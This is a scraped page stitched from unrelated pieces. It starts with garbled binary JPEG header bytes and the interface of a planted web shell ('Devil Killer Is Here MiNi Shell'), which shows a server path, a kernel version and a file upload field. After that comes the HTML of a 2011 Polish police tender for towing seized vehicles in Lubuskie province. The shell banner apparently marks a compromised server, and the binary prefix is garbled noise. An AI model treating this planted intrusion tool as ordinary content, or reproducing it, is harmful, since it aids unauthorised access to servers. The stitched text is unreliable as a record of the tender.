JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110406/66982-N-2011.html

<p class="kh_header"><b>Gorzów Wielkopolski: Świadczenie kompleksowych usług w zakresie holowania (przewozu) pojazdów samochodowych, motocyklowych i części zabezpieczonych przez Policję do celów procesowych, na obszarze działania jednostek Policji woj. lubuskiego - Powtórzenie.</b><br>
<b>Numer ogłoszenia: 66982 - 2011; data zamieszczenia: 06.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Kwiatowa 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 95 738 14 41, faks 95 738 14 35.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubuska.policja.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie Dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Policja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie kompleksowych usług w zakresie holowania (przewozu) pojazdów samochodowych, motocyklowych i części zabezpieczonych przez Policję do celów procesowych, na obszarze działania jednostek Policji woj. lubuskiego - Powtórzenie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zakres przedmiot zamówienia obejmuje następujące czynności:
a)przyjęcie zlecenia przez Wykonawcę (przez 24h na dobę 7 dni w tygodniu);
b)dojazd holownika w określonym czasie do wskazanego przez Policję  miejsca postoju pojazdu samochodowego, motocyklowego (części samochodowych, motocyklowych);
c)załadunek i rozładunek pojazdu samochodowego, motocyklowego lub innego, a także części samochodowych, motocyklowych oraz innych przedmiotów pozostawionych w pojeździe samochodowym/motocyklu, stanowiących zarówno jego wyposażenia jak i nie będących jego wyposażeniem lecz zabezpieczonych przez Policję do celów procesowych w związku ze sprawą będącą następstwem zdarzenia;
d)zebranie z miejsca zdarzenia wszystkich przedmiotów wskazanych przez policjantów i opisanych w dyspozycji;
e)holowanie (przewóz i rozładunek) pojazdu samochodowego, motocyklowego (części samochodowych, motocyklowych oraz innych przedmiotów zabezpieczonych przez Policję) na parking wskazany przez Zamawiającego - który zostanie wybrany w drodze odrębnego postępowania - wraz z ich protokolarnym przyjęciem przez dyspozytora parkingu strzeżonego; 
f)zapewnienie w trakcie obowiązywania umowy, całodobowej łączności (przy użyciu telefonów stacjonarnych lub komórkowych) w celu umożliwienia przekazywania dyspozycji w każdym momencie świadczenia usługi;
g)Wykonawcy występujący wspólnie będą realizować zamówienie zgodnie z umową konsorcjum z której w sposób jednoznaczny będzie wynikać podział kompetencji pomiędzy członkami konsorcjum. Informacja o zakresie zadań (podziale kompetencji) wraz z wykazem osób i numerami telefonów kontaktowych do osób odpowiedzialnych za realizację zlecanych usług będzie zawarta w Umowie;
h)w trakcie trwania umowy zawartej w wyniku niniejszego postępowania, Wykonawca zobowiązany jest do świadczenia usług będących przedmiotem zamówienia, według zasad podwyższonej staranności, przy użyciu sprzętu którego stan techniczny gwarantuje wysoki poziom jakości wykonywanych usług;
i)w trakcie świadczenia usługi przewozu, Wykonawca zobowiązany jest używać tylko takich środków transportu, których użycie będzie niezbędne dla prawidłowego wykonania zlecenia. Ilość części i akcesoriów pojazdów mechanicznych oraz innych przedmiotów zabezpieczonych przez Policję w miejscu zdarzenia, mieszcząca się i przewożona na jednym środku transportu będzie określana w umowie jako (transport);
j)w trakcie świadczenia usługi przyjęcie pełnej odpowiedzialności cywilno-prawnej za holowane pojazdy lub ich części, oraz inne przedmioty zabezpieczone przez Policję w następstwie zdarzenia;
k)wykonywanie dyspozycji w sposób określony w umowie, z uwzględnieniem formalności wymaganych w dyspozycji usunięcia pojazdu/części w protokole zdawczo-odbiorczym, protokole opisu przedmiotu przed przekazaniem go na parking depozytowy;
l)prowadzenie i przekazywanie do Zamawiającego w terminie do 5-go każdego miesiąca wykazu holowanych w okresie minionego miesiąca pojazdów. Wykaz będzie podstawą do wystawienia  faktury za usługę holowania/załadunku/rozładunku w ramach zawartej umowy.
2.Pojazdy ciężarowe albo ciągniki samochodowe razem z przyczepą będą traktowane jako 1 pojazd samochodowy o dopuszczalnej masie całkowitej przekraczającej 16t.
3.Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego.
4.Termin płatności: 30 dni kalendarzowych od dnia dostarczenia faktury VAT do siedziby Zamawiającego.
Szczegóły dotyczące płatności zawiera projekt Umowy (zał. nr 5 do SIWZ), dostępny na stronie internetowej Zamawiającego: www.lubuska.policja.gov.pl.
5.Ze względu na specyfikę przedmiotu zamówienia oraz charakter Zamawiającego, Zamawiający  zastrzega, że część zamówienia nie może być powierzona podwykonawcom tj.: Zamawiający nie dopuszcza powierzenia Podwykonawcy obowiązków związanych z holowaniem (przewozem) pojazdu samochodowego, motocyklowego oraz części samochodowych, motocyklowych i innych przedmiotów zabezpieczonych przez Policję w następstwie zdarzenia (na mocy art. 36 ust. 5 ustawy P.z.p.).
6. Zamawiający dopuszcza możliwość składania ofert częściowych, w zależności od miejsca realizacji przedmiotu zamówienia. 
7.Przedmiot zamówienia podzielono na 17 części - Zakres terytorialny świadczenia usługi dla każdej części obejmuje teren administracyjny podległy danej jednostce Policji: 
Część 1: nadzór kompetencyjny: KP Kostrzyn n/O Gminy: Kostrzyn;
Część 2: nadzór kompetencyjny: KPP Strzelce Kraj. Gminy: Strzelce Kraj., Zwierzyń, Stare Kurowo, Drezdenko, Dobiegniew;
Część 3: nadzór kompetencyjny:  KPP Międzyrzecz Gminy: Międzyrzecz, Pszczew, Trzciel; Część 4: nadzór kompetencyjny: KP Skwierzyna Gminy: Skwierzyna, Przytoczna, Bledzew; Część 5: nadzór kompetencyjny: KPP Sulęcin Gminy: Sulęcin, Torzym, Lubniewice, Krzeszyce, Słońsk; 
Część 6: nadzór kompetencyjny: KPP Krosno Odrz. Gminy: Krosno Odrz., Bobrowice, Dąbie, Bytnica, Maszewo; Część 7: nadzór kompetencyjny: KP Gubin
Gmina: Gubin; Część 8: nadzór kompetencyjny: KMP Zielona Góra Miasto i Gminy: Zielona Góra, Czerwieńsk, Świdnica, Nowogród Bobrzański, Zabór; 
Część 9: nadzór kompetencyjny: KP Sulechów Gminy: Sulechów, Babimost, Kargowa, Trzebiechów, Bojadła;
Część 10: nadzór kompetencyjny: KPP Nowa Sól Gminy: Nowa Sól, Otyń, Kalsko, Siedlisko; Część 11: nadzór kompetencyjny: KPP Kożuchów Gminy: Nowe Miasteczko, Bytom Odrz.; Część 12: nadzór kompetencyjny: KPP Świebodzin
Gminy: Świebodzin, Skąpe, Lubrza, Łagów, Szczaniec, Zbąszynek;
Część 13: nadzór kompetencyjny: KPP Żagań Gminy: Żagań, Brzeźnica, Iłowa, Gozdnica, Wymiarki; Część 14: nadzór kompetencyjny: KP Szprotawa Gminy: Szprotawa, Niegosławice, Małomice; Część 15: nadzór kompetencyjny: KPP Żary
Gminy: Żary, Jasień, Lipinki Łuż., Lubsko, Brody, Tuplice, Łęknica, Przewóz, Trzebiel;
Część 16: nadzór kompetencyjny: KPP Wschowa Gminy: Wschowa, Szlichtyngowa;
Część 17: nadzór kompetencyjny: KP Sława Gmina: Sława..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.Zamawiający przewiduje możliwość udzielania wybranemu wykonawcy zamówień uzupełniających. 
2.Zakres zamówień uzupełniających: powtórzenie tego samego rodzaju zamówień zgodnie z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.11.81.10-9, 50.11.80.00-5, 63.71.20.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 17.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie Dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania jeżeli Wykonawca:
a) posiada uprawnienia do wykonywania określonej działalności gospodarczej, tj. posiada licencję na wykonanie krajowego transportu drogowego wydaną na podstawie ustawy z dnia 6  września 2001r. o transporcie drogowym (Dz.U. z 2001r., nr 125, poz. 1371 z późn. zm.) z tym, że warunek musi być spełniony przez Wykonawcę (członka Konsorcjum), który będzie świadczył usługi holowania (przewozu) pojazdów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) warunek dotyczący posiadania wiedzy i doświadczenia może być spełniony wspólnie przez członków Konsorcjum.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia jeżeli Wykonawca:
a) dysponuje pojazdami zapewniającymi prawidłową realizację zamówienia publicznego, w tym :
a.1) co najmniej 2 pojazdy specjalne przystosowane do holowania (przewozu) uszkodzonych pojazdów, w tym przynajmniej jeden przystosowany do przewozu pojazdów o DMC powyżej 3,5 ton;
a.2) sprzęt zapewniający sprawny załadunek i rozładunek  pojazdów  (części samochodowych) o DMC  do 3,5 t i powyżej 3,5t;
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) powyższy warunek może być spełniony przez wszystkich członków Konsorcjum wspólnie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący dysponowania odpowiednimi  osobami zdolnymi do wykonania zamówienia jeżeli Wykonawca:
a) dysponuje osobami zdolnymi do wykonania zamówienia w tym min.2 osobami z uprawnieniami do holowania pojazdów o DMC powyżej  3,5 t.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) powyższy warunek może być spełniony przez wszystkich członków Konsorcjum wspólnie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący sytuacji ekonomicznej i finansowej, jeżeli Wykonawca posiada opłaconą polisę ubezpieczeniową od odpowiedzialności cywilnej w  zakresie prowadzonej działalności, stwierdzającej ubezpieczenie w przypadku szkód powstałych na skutek uszkodzenia, kradzieży samych pojazdów lub ich części  oraz innych przedmiotów zabezpieczonych przez Policję w następstwie zdarzenia. Zamawiający wymaga aby Wykonawca posiadał w/w polisę przez cały czas trwania umowy zawartej w wyniku toczącego się postępowania.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum) warunek może być  spełniony wspólnie przez członków Konsorcjum.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  W celu wykazania spełniania warunków udziału w postępowaniu (art. 22 ust. 1 ustawy P.z.p.) oraz o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy P.z.p. Wykonawca zobowiązany jest złożyć:
a)  oświadczenie (wzór - zał. nr 2 do SIWZ), że Wykonawca spełnia warunki art. 22 ust. 1 ustawy i o braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 i 2 ustawy Pzp. 
W przypadku Wykonawców występujących wspólnie w/w dokument składa każdy z Wykonawców. 
Jeżeli Wykonawca składa ofertę na więcej niż 1 część, Zamawiający dopuszcza złożenie jednego oświadczenia do wszystkich części.
b) oświadczenie, że Wykonawca posiada licencję na wykonanie krajowego transportu drogowego wydaną na podstawie ustawy z dnia 6  września 2001r. o transporcie drogowym (Dz.U. z 2001r., Nr 125 poz. 1371 z późn. zm.) - wzór - zał. nr 4 o SIWZ. 
W przypadku Wykonawców występujących wspólnie, wyżej wymieniony dokument składa każdy z Wykonawców. który będzie świadczył usługi holowania (przewozu) pojazdów.
Jeżeli Wykonawca składa ofertę na więcej niż 1 część, Zamawiający dopuszcza złożenie jednego oświadczenia do wszystkich części.
c) oświadczenie wzór - zał. nr 6a, 6b, do SIWZ:
c.1. Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych zał. 6a do SIWZ - Wykonawca dysponuje sprzętem przewidzianym do realizacji zamówienia (na danym obszarze)zgodnie z wymaganiem Zamawiającego określonym w pkt XII ppkt 2.3) lit. a) SIWZ - wraz z informacją o podstawie dysponowania tym sprzętem;
Jeżeli Wykonawca składa ofertę na więcej niż 1 część Oświadczenie należy złożyć dla każdej części oddzielnie.
c.2. Oświadczenie, że osoby które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia zał. 6b do SIWZ - osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia tj. uprawnienia do holowania pojazdów o DMC powyżej  3,5 t. 
Jeżeli Wykonawca składa ofertę na więcej niż 1 część Oświadczenie należy złożyć dla każdej części  oddzielnie.
W przypadku Wykonawców występujących  wspólnie, można złożyć oświadczenie z treści którego będzie wynikać, że Wykonawcy ci łącznie spełniają warunek określony w pkt XII ppkt 2.3) lit. a) i lit. b) SIWZ. Jeżeli Wykonawca składa ofertę na więcej niż 1 część Oświadczenie należy złożyć dla każdej części oddzielnie.
d) aktualną opłaconą polisę ubezpieczeniową od OC w zakresie prowadzonej działalności, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Ze złożonego dokumentu musi wynikać spełnianie warunku opisanego w pkt XII ppkt 2.4) SIWZ. 
Jeżeli Wykonawca składa ofertę na więcej niż 1 część, Zamawiający dopuszcza złożenie       
jednego dokumentu do wszystkich części .
W przypadku Wykonawców występujących  wspólnie, można złożyć dokument z treści którego będzie wynikać, że Wykonawcy ci łącznie spełniają powyższy warunek.
e) aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru . Dokument winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Warunek aktualności spełniać będzie również dokument wystawiony z datą wcześniejszą i potwierdzony w wymaganym terminie przez organ wydający.
Jeżeli Wykonawca składa ofertę na więcej niż 1 część, Zamawiający dopuszcza złożenie jednego dokumentu do wszystkich części . 
W przypadku Wykonawców występujących wspólnie, w/w dokumenty składa każdy z Wykonawców.
2. Jeżeli Wykonawca wykazując spełnianie warunku o którym mowa w punkcie XII ppkt 2.3) lit. a) i lit. b) SIWZ polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy P.z.p., a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający będzie żądał od Wykonawcy przedstawienia w odniesieniu do tych podmiotów oświadczenia o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy P.z.p. (pkt XIII ppkt 1 lit.a) SIWZ)  oraz dokumentów wymienionych w pkt XIII ppkt 1 lit. e) SIWZ.
3. Jeżeli Wykonawca wykazując spełnianie warunku, o którym mowa w punkcie XII ppkt 2.4) SIWZ polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art.26 ust. 2b ustawy P.z.p., Zamawiający wymaga od Wykonawcy przedstawienia w odniesieniu do tych podmiotów informacji wymienionej w § 1 ust.1 pkt 9 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie dokumentów jakich może żądać zamawiający od Wykonawcy, oraz form w jakich te dokumenty mogą być składane.
4.INFORMACJA O ZAWARTOŚCI OFERTY WYKONAWCY
4.1. Wykonawca musi załączyć do oferty:
a)prawidłowo wypełniony i podpisany Formularz  ofertowy (zał. nr 1 do SIWZ). W formularzu należy wpisać nr części oraz nadzór kompetencyjny na który Wykonawca składa ofertę. Wszystkie puste pola muszą być wypełnione przez Wykonawcę. Na każdą część należy złożyć oddzielny Formularz.
W przypadku Wykonawców występujących wspólnie (konsorcjum), należy złożyć jeden formularz ofertowy. Zamawiający nie dopuszcza możliwości złożenia, dwóch lub kilku formularzy ofertowych, na jedną część przedmiotu zamówienia-oferta wariantowa.
b) w przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć upoważnienie lub  pełnomocnictwo (w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez 	 notariusza - wyrok SO w warszawie - SYGN.AKT V CA 85/07), określające zakres czynności, do których jest umocowany. 
Jeżeli Wykonawca składa ofertę na więcej niż 1 część, Zamawiający dopuszcza złożenie jednego dokumentu do wszystkich części .
c) oświadczenie o podwykonawcach, jeżeli Wykonawca przewiduje ich udział w realizacji zadania 	(wzór - zał. nr 3 do SIWZ); Jeżeli Wykonawca składa ofertę na więcej niż 1 część Oświadczenie należy złożyć dla każdej części oddzielnie. 
d) oświadczenie o woli współpracy Wykonawców wspólnie przystępujących do postępowania podpisane przez wszystkich wykonawców. Oświadczenie musi zawierać następujące informacje: 
- nazwy i adresy Wykonawców, którzy wspólnie przystępują do postępowania przetargowego;
- wyznaczenie Lidera do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego wraz z nazwą zadania - tytułem postępowania.
Osoba upoważniona przez Lidera do reprezentowania musi posiadać stosowne upoważnienie (zgodne z  pkt XIII ppkt 4.1 lit. b) SIWZ);
Jeżeli Wykonawca składa ofertę na więcej niż 1 część Oświadczenie należy złożyć dla każdej części oddzielnie.
e) w przypadku złożenia oferty przez spółkę cywilną należy załączyć upoważnienie lub pełnomocnictwo ustanawiające pełnomocnika do reprezentowania s.c. w postępowaniu o udzielenie zamówienia publicznego i zawarcia umowy w sprawie zamówienia publicznego.
Jeżeli Wykonawca składa ofertę na więcej niż 1 część Oświadczenie należy złożyć dla każdej części oddzielnie.
4.2. Ponadto Zamawiający zaleca załączyć do oferty: 
